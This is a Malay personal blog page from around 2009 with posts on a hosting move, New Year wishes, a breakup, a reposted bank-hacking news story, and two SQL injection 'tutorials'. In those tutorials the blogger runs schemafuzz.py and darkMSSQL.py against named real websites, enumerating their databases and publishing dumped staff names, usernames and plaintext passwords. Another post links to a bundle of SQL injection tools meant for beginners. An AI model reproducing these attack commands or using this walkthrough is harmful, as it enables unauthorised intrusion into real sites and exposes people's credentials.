New Place! :)

•January 2, 2010 • Leave a Comment

Hari ini telah selamat aku pindahkan data-data dan artikel-artikel aku dari wordpress ini ke hosting baru aku.

Lega rasanya hosting tu dah selamat di’online’kan..

Hosting aku yang bertempat di Malcube.com ini adalah dibeli semasa promosinya iaitu RM 45/setahun.

Pakej ini diberi nama Blogger package khas untuk mereka-mereka yang inginkan hosting sendiri untuk membuat blog mereka..

Dengan saiz disk sebanyak 500mb dan bandwidth sebanyak 10gb untuk pakej ini..

Jadi, sila-silalah lawat blog baru aku ek ! Ini link ke blog baru aku..

http://zer0zam.com/

Aku tak akan lagi update blog aku kat server wordpress ni.. Aku just update di blog baru aku sahaja..

Jadi, sila2 lah melawat ek! ūüôā

p/s : pakej ni pun suhz yang promote kat TBD Security.. :p

thanx suhz!

Advertisements

Selamat Tahun Baru !

•January 1, 2010 • Leave a Comment

Alhamdulillah.. Kita telah selamat menempuhi liku-liku pahit getir pada tahun 2009.
Kini tiba tahun 2010..
1 tahun baru.. Dengan semangat baru..

Korang mesti banyak pengalamankan masa tahun lepas?
Aku pun sama.. Banyak yang aku nak kongsikan..
Tapi tak mengapalah..


To Nurfarhana Bt. Azian,

zam mintak maaf sangat-sangat kalau zam banyak melukakan hati ana..

Zam sayang Ana.. ūüôā

Khas untuk Ana.

Pernah Ada Rasa Cinta Antara Kita
Kini Tinggal Kenangan
Ingin ku  Lupakan Semua Tentang Dirimu
Namun Tak Lagi Kan Seperti Dirimu
Oh  Bintangku

Jauh Kau Pergi Meninggalkan Diriku
Di Sini aku  Merindukan Dirimu oohhh
Kini ku Coba Mencari Penggantimu
Namun Tak  Lagi Kan Seperti Dirimu
Oh Kekasih

Pernah Ada Rasa Cinta  Antara Kita
Kini Tinggal Kenangan
Ingin ku Lupakan Semua Tentang  Dirimu
Namun Tak Lagi Kan Seperti Dirimu
Oh Bintangku

Jauh  Kau Pergi Meninggalkan Diriku
Di Sini aku Merindukan Dirimu oohhh
Kini  ku Coba Mencari Penggantimu
Namun Tak Lagi Kan Seperti Dirimu
Oh  Kekasih

Pernah Ada Rasa Cinta Antara Kita
Kini Tinggal  Kenangan....

Pada tahun yang baru ni, bersama teman baru,
Jagalah dia sepenuh hati ana..
Jangan ulangi apa yang terjadi sebelum ini..
Ana kata ana nak berubahkan?
So, berubahlah betul-betul..
Jadikan apa yang terjadi masa kita bersama selama 9 bulan itu sebagai satu kenangan yang manis..(walaupun kadang-kadang ada pahitnya) :p
Selamat tahun baru zam ucapkan.

schemafuzz tutorial

•December 30, 2009 • Leave a Comment

benda ni digunakan untuk MySQL database yang ade error.. atau erti lain nye, sql injection! ūüôā

schemafuzz.py journey… begin…

samurai@AnGry-Milw0rM:~/Desktop$ ./schemafuzz.py -h

Usage: ./schemafuzz.py [options]                          rsauron[@]gmail[dot]com darkc0de.com
Modes:
Define: –dbs¬†¬†¬†¬†¬†¬†¬†¬†¬† Shows all databases user has access too.¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬† ¬† ¬† ¬† ¬† ¬† ¬† ¬† ¬† ¬† ¬†¬† MySQL v5+
Define: –schema¬† Enumerate Information_schema Database.¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬† ¬† ¬† ¬† ¬† ¬† ¬† ¬† MySQL v5+
Define: –full¬†¬†¬†¬†¬†¬†¬†¬†¬†¬† Enumerates all databases information_schema table¬†¬†¬†¬†¬†¬†¬†¬†¬† MySQL v5+
Define: –dump¬†¬†¬†¬†¬† Extract information from a Database, Table and Column.¬† MySQL v4+
Define: –fuzz¬†¬†¬†¬†¬†¬†¬†¬† Fuzz Tables and Columns.¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬† MySQL v4+
Define: –findcol¬†¬† Finds Columns length of a SQLi¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬† ¬† ¬† ¬† ¬† ¬† ¬† ¬† ¬† ¬† ¬† ¬† ¬† ¬† ¬† ¬†¬† MySQL v4+
Define: –info¬†¬†¬†¬†¬†¬†¬†¬†¬† Gets MySQL server configuration only.¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬† ¬† ¬† ¬† ¬† ¬† ¬† ¬† ¬† ¬† ¬† ¬†¬† MySQL v4+

Required:
Define: -u¬†¬†¬†¬†¬†¬†¬† URL “www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4”

Mode dump and schema options:
Define: -D¬†¬†¬†¬†¬†¬†¬† “database_name”
Define: -T¬†¬†¬†¬†¬†¬†¬† “table_name”
Define: -C¬†¬†¬†¬†¬†¬†¬† “column_name,column_name…”

Optional:
Define: -p¬†¬†¬†¬†¬†¬†¬† “127.0.0.1:80 or proxy.txt”
Define: -o¬†¬†¬†¬†¬†¬†¬† “ouput_file_name.txt”¬†¬†¬†¬†¬†¬†¬† Default is schemafuzzlog.txt
Define: -r        row number to start at
Define: -v¬†¬†¬†¬†¬†¬†¬† Verbosity off option. Will not display row #’s in dump mode.

Ex: ./schemafuzz.py –info -u “www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4”
Ex: ./schemafuzz.py –dbs -u “www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4”
Ex: ./schemafuzz.py –schema -u “www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4” -D catalog -T orders -r 200
Ex: ./schemafuzz.py –dump -u “www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4” -D joomla -T jos_users -C username,password
Ex: ./schemafuzz.py –fuzz -u “www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4” -end “/*” -o sitelog.txt
Ex: ./schemafuzz.py –findcol -u “www.site.com/news.php?id=22”

samurai@AnGry-Milw0rM:~/Desktop$ ./schemafuzz.py –findcol -u http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4–

|—————————————————————|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|—————————————————————|

[+] URL:http://www.rockiurbanfitness.com.au/trainers.php?id=8–
[+] Evasion Used: “+” “–”
[+] 01:58:30
[+] Proxy Not Given
[+] Attempting To find the number of columns…
[+] Testing: 0,1,2,3,4,
[+] Column Length is: 5
[+] Found null column at column #: 0
[+] SQLi URL: http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+0,1,2,3,4–
[+] darkc0de URL: http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4
[-] Done!

samurai@AnGry-Milw0rM:~/Desktop$ ./schemafuzz.py –info -u http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4–

|—————————————————————|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|—————————————————————|

[+] URL:http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4–
[+] Evasion Used: “+” “–”
[+] 01:59:55
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: ruf_http
User: ruf_user@localhost
Version: 5.0.45-community-nt

[+] Do we have Access to MySQL Database: No

[+] Do we have Access to Load_File: No

[-] [01:59:58]
[-] Total URL Requests 3
[-] Done

samurai@AnGry-Milw0rM:~/Desktop$ ./schemafuzz.py –dbs -u http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4–

|—————————————————————|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|—————————————————————|

[+] URL:http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4–
[+] Evasion Used: “+” “–”
[+] 02:00:10
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: ruf_http
User: ruf_user@localhost
Version: 5.0.45-community-nt
[+] Showing all databases current user has access too!
[+] Number of Databases: 2

[0]ruf_http
[1]test

[-] [02:00:16]
[-] Total URL Requests 4
[-] Done

samurai@AnGry-Milw0rM:~/Desktop$ ./schemafuzz.py –schema -D ruf_http -u http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4–

|—————————————————————|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|—————————————————————|

[+] URL:http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4–
[+] Evasion Used: “+” “–”
[+] 02:01:06
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: ruf_http
User: ruf_user@localhost
Version: 5.0.45-community-nt
[+] Showing Tables & Columns from database “ruf_http”
[+] Number of Tables: 6

[Database]: ruf_http
[Table: Columns]
[0]blogs: blogid,title,blog,posted,trainerid
[1]comments: commentid,name,comment,blogid,posted,approved
[2]events: eventid,name,description,date
[3]links: linkid,title,link
[4]testimonials: testimonialid,fname,lname,testimonial
[5]trainers: trainerid,fname,lname,pwd,age,bio

[-] [02:02:12]
[-] Total URL Requests 30
[-] Done

samurai@AnGry-Milw0rM:~/Desktop$ ./schemafuzz.py –dump -D ruf_http -T trainers -C pwd -u http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4–

|—————————————————————|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|—————————————————————|

[+] URL:http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4–
[+] Evasion Used: “+” “–”
[+] 02:04:12
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: ruf_http
User: ruf_user@localhost
Version: 5.0.45-community-nt
[+] Dumping data from database “ruf_http” Table “trainers”
[+] Column(s) [‘pwd’]
[+] Number of Rows: 4

[0] Natalie
[1] glasfryn
[2] ella
[3] attack

[-] [02:04:26]
[-] Total URL Requests 6
[-] Done

samurai@AnGry-Milw0rM:~/Desktop$ ./schemafuzz.py –dump -D ruf_http -T trainers -C fname -u http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4–

|—————————————————————|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|—————————————————————|

[+] URL:http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4–
[+] Evasion Used: “+” “–”
[+] 02:04:43
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: ruf_http
User: ruf_user@localhost
Version: 5.0.45-community-nt
[+] Dumping data from database “ruf_http” Table “trainers”
[+] Column(s) [‘fname’]
[+] Number of Rows: 4

[0] Natalie
[1] Kathryn
[2] Sarah
[3] Craig

[-] [02:04:51]
[-] Total URL Requests 6
[-] Done

samurai@AnGry-Milw0rM:~/Desktop$ ./schemafuzz.py –dump -D ruf_http -T trainers -C lname -u http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4–

|—————————————————————|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|—————————————————————|

[+] URL:http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4–
[+] Evasion Used: “+” “–”
[+] 02:04:59
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: ruf_http
User: ruf_user@localhost
Version: 5.0.45-community-nt
[+] Dumping data from database “ruf_http” Table “trainers”
[+] Column(s) [‘lname’]
[+] Number of Rows: 4

[0] Sach
[1] Jones
[2] Stone
[3] O

[-] [02:05:12]
[-] Total URL Requests 6
[-] Done

korang paham x bnd ni?

x susah sgt rase nye bnd ni..

ape2 pn, x paham, blh tny aku.. ūüôā

p/s : thanks to rsauron from darkc0de for this script.. nice one mate ! ūüôā

darkMSSQL tutorial

•December 30, 2009 • Leave a Comment

Hari ini aku nak tunjukkan macammana cara menggunakan darkMSSQL.py…

benda ni digunakan untuk MSSQL database yang ade error..

darkMSSQL.py journey… begin…

-h command (help)
Usage: ./darkMSSQL.py [options]                       rsauron[@]gmail[dot]com darkc0de.com
Modes:
Define: –info¬†¬†¬† Gets MySQL server configuration only.
Define: –dbs¬†¬†¬†¬† Shows all databases user has access too.
Define: –schema¬† Enumerate Information_schema Database.
Define: –dump¬†¬†¬† Extract information from a Database, Table and Column.
Define: –insert¬† Insert data into specified db, table and column(s).

Required:
Define: -u¬†¬†¬†¬†¬†¬†¬† URL “www.site.com/news.asp?id=2” or “www.site.com/index.asp?id=news'”

Mode dump and schema options:
Define: -D¬†¬†¬†¬†¬†¬†¬† “database_name”
Define: -T¬†¬†¬†¬†¬†¬†¬† “table_name”
Define: -C¬†¬†¬†¬†¬†¬†¬† “column_name,column_name…”

Optional:
Define: -p¬†¬†¬†¬†¬†¬†¬† “127.0.0.1:80 or proxy.txt”
Define: -o¬†¬†¬†¬†¬†¬†¬† “ouput_file_name.txt”¬†¬†¬†¬†¬†¬†¬† Default is darkMSSQLlog.txt
Define: -r¬†¬†¬†¬†¬†¬†¬† “-r 20” this will make the script resume at row 20 during dumping
Define: –cookie¬† “cookie_file.txt”
Define: –debug¬†¬† Prints debug info to terminal.

Ex: ./darkMSSQL.py –info -u “www.site.com/news.asp?id=2”
Ex: ./darkMSSQL.py –dbs -u “www.site.com/news.asp?id=2”
Ex: ./darkMSSQL.py –schema -u “www.site.com/news.asp?id=2” -D dbname
Ex: ./darkMSSQL.py –dump -u “www.site.com/news.asp?id=2” -D dbname -T tablename -C username,password
Ex: ./darkMSSQL.py -u “www.site.com/news.asp?news=article'” -D dbname -T table -C user,pass –insert -D dbname -T table -C darkuser,darkpass

samurai@AnGry-Milw0rM:~/Desktop$ python darkMSSQL.py –info -u http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|————————————————|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|————————————————|

[+] URL:http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:19:25
[+] Cookie: None
[+] Proxy Not Given
[+] Displaying information about MSSQL host!

[+] @@VERSION: Microsoft SQL Server  2000 Р8.00.2039 (Intel X86)
May  3 2005 23:18:38
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

[+] USER: mylittletail_usr
[+] DB_NAME(): mylittletail_db
[+] HOST_NAME(): SERVER439

[+] Script detected Microsoft SQL Version:  2000
[+] Checking to see if we can view password hashs… Nope!

[-] [00:19:26]
[-] Total URL Requests 5
[-] Done

Don’t forget to check darkMSSQLlog.txt

samurai@AnGry-Milw0rM:~/Desktop$ python darkMSSQL.py –dbs -u http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|————————————————|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|————————————————|

[+] URL: http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:19:39
[+] Cookie: None
[-] Proxy Not Given
[+] Displaying list of all databases on MSSQL host!

[0] mylittletail_db
[1] master
[2] tempdb
[3] model
[4] msdb
[5] pubs
[6] Northwind
[7] lotteryuk_db
[8] mylittletail_db
[9] sailor_db

[-] 00:19:41
[-] Total URL Requests 11
[-] Done

Don’t forget to check darkMSSQLlog.txt

samurai@AnGry-Milw0rM:~/Desktop$ python darkMSSQL.py –schema -D mylittletail_db -u http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|————————————————|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|————————————————|

[+] URL:http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:31:03
[+] Cookie: None
[+] Proxy Not Given
[+] Displaying tables inside DB: mylittletail_db

[0] addon
[1] category
[2] country
[3] delivery
[4] discount
[5] dtproperties
[6] featured_category
[7] featured_item
[8] featured_maincategory
[9] item_packages
[10] item_questions
[11] items
[12] items_addon
[13] items_also
[14] main_items
[15] member
[16] message
[17] millkak
[18] newsletter_counter
[19] newsletter_log
[20] newsletter_master
[21] order
[22] order_item
[23] subcategory
[24] sysconstraints
[25] syssegments
[26] t_jiaozhu
[27] temp_order
[28] temp_order_id
[29] ticketing
[30] uploadform
[31] userlog
[32] users

[-] [00:31:09]
[-] Total URL Requests 34
[-] Done

Don’t forget to check darkMSSQLlog.txt

samurai@AnGry-Milw0rM:~/Desktop$ python darkMSSQL.py –dump -D mylittletail_db -T users -C username,password -u http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|————————————————|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|————————————————|

[+] URL:http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:27:52
[+] Cookie: None
[+] Proxy Not Given
[0] 20admin08:72hu1ge9 admin
[1] yennee08:01yen04nee admin
[2] jolen18e:dedica18 staff
[3] jason:11jas37on5 admin
[4] katrina03:031983 staff
[5] zack09:20gift09 staff
[6] 3sales69:3moneytail69 staff

[-] [00:27:54]
[-] Total URL Requests 8
[-] Done

Don’t forget to check darkMSSQLlog.txt

korang paham x bnd ni?

klu x paham, bole tny aku..

bukannya susah sgt pn.. ūüėÄ

p/s : thanks to rsauron from darkc0de for this script.. nice one mate ! ūüôā

Want to learn SQL Injection? hurm..

•December 29, 2009 • Leave a Comment

Dari mula aku belajar sqli ni, sampai la sekarang..
Banyak benda dan pengalaman yang aku tempuh..
Aku belajar dari ‘zero’ sampai aku jadi diri aku pada hari ini..

Maybe betul kata Lyn..
Aku ni addicted..
My curiosity make me go further..

Haha..
Apa-apa pun, aku nak share ngan korang sume tools yang aku rasa sesuai dan user-friendly la.. ūüôā

1. schemafuzz.py
2. darkMSSQL.py
3. darkPGSQLi.py
4. m4xmysql
5. Simple SQLi Dumper 1.0 (SSDp)
6. Reiluke admin finder
7. Havij 1.07

Download link : http://www.mediafire.com/?jlmwzujzfzi

Haa.. Inilah tools yang aku rasa,
newbie2 yang berminat nak belajar pasal sql injection ni patut gune..ÔĽŅ

Tutorial?
Alamak, sekarang x berapa nak ada la masa untuk buat tutorial..
Nanti la, ada masa aku post kn..
Lagi pun bukan nya susah sangat pn.. :p

Ok la, aku chow dulu..
Assalamualaikum..

p/s : special thanks to those that contribute making the scripts and tools.. ūüôā

Merry Christmas to Citibank US! :)

•December 26, 2009 • 1 Comment

Russian hackers ‘stole from US banks’

THE FBI is investigating the activities of a notorious Russian internet gang amid accusations that it stole tens of millions of dollars from US banks.

The hackers, known as the Russian Business Network, had been quiet for two years after masterminding a string of crimes including identity theft, fraud, spam and child pornography.

But the gang could be back in action, according to a report in The Wall Street Journal, which suggested that Citigroup was the focus of a US federal investigation linked to the Russian group.

The newspaper claimed that an attack believed to have been orchestrated by the network netted large sums of money after targeting Citigroup’s computer systems.

Reports of the cyber attack came as the White House yesterday named Howard Schmidt as its head of cyber security. Mr Schmidt, who had a similar role for several years under George Bush, will co-ordinate US government, military and intelligence efforts to repel hackers.

There has been a string of reports about hacking attacks on the US Government in recent months, as well as the theft of more than ¬£5 million ($9 million) from systems belonging to the Royal Bank of Scotland. The threats led the US President, Barack Obama, to declare that defence against internet attacks was a ”national security priority” – a shift which culminated in Mr Schmidt’s appointment.

Citigroup, the world’s largest financial services company, has rejected suggestions that the FBI is investigating an incident at the bank, and denied that a raid of such proportions had taken place.

”We had no breach of the system and there were no losses, no customer losses, no bank losses,” said Joe Petro, the managing director of Citigroup’s security and investigative services. ”Any allegation that the FBI is working a case at Citigroup involving tens of millions of losses is just not true.”

Instead, a spokesman said, the company is aware of one customer whose account was drained of more than $US1 million after being hacked.

The nature of the attack remains contested, but the reports mark a significant comeback for one of the internet’s most high-profile crime groups. The organisation disappeared from view in 2007 after moving its operations from St Petersburg to China. The extended absence had left some wondering whether it had disbanded, but experts familiar with the network’s activities suggested that its influence on organised crime was still strong.

”All signs point to a dramatic rise in cyber crime,” said Anton Chuvakin, a computer security expert based in San Jose.

It would not be the first time that Citigroup or its customers had been targeted by computer criminals. Earlier this year Albert Gonzalez, a 28-year-old hacker from Florida, was charged by US prosecutors with organising a series of computer attacks that netted millions over the course of several years.

Citibank was among the groups targeted by the strikes, which resulted in more than 45 million credit card numbers being stolen.

Last weekend, it emerged that the Russian military had been meeting Washington officials to discuss potential collaboration over internet security and cyber defence. Such a move would mark a breakthrough in the often frosty relations between the two countries over their activities online.

sumber dari : http://www.smh.com.au/technology/enterprise/russian-hackers-stole-from-us-banks-20091223-ldf9.html

p/s ; aku terbaca surat khabar Utusan kot mase aku kat Hospital Serdang. Tu yang aku tergerak nk post artikel ni..

Rasa untuk kesekian kalinya..

•December 21, 2009 • Leave a Comment

8.3.2009 = 1 tarikh yang bagiku amat bermakna dalam hidupku.. Kenapa? Hari dimana ku kenal erti bahagia..

Ku korbankan ape je untuk die..

Tapi..

Inikah yang patut aku dapat?

Inikah balasannya?

Pada tarikh 21.12.2009, berakhirnya hubunganku bersama gadis yang amat ku sayangi..

Sebabnya?

Biarlah kami je yang tahu sebabnya..

Aku amat sedih memikirkan benda ni..

Ahh..

Hidup perlu diteruskan..

Lupakan je la die tu.. Perjalanan ko masih jauh..

Ingat, ko nak berjayakan.. Orang dah x suka, biarkan je la..

Sekian..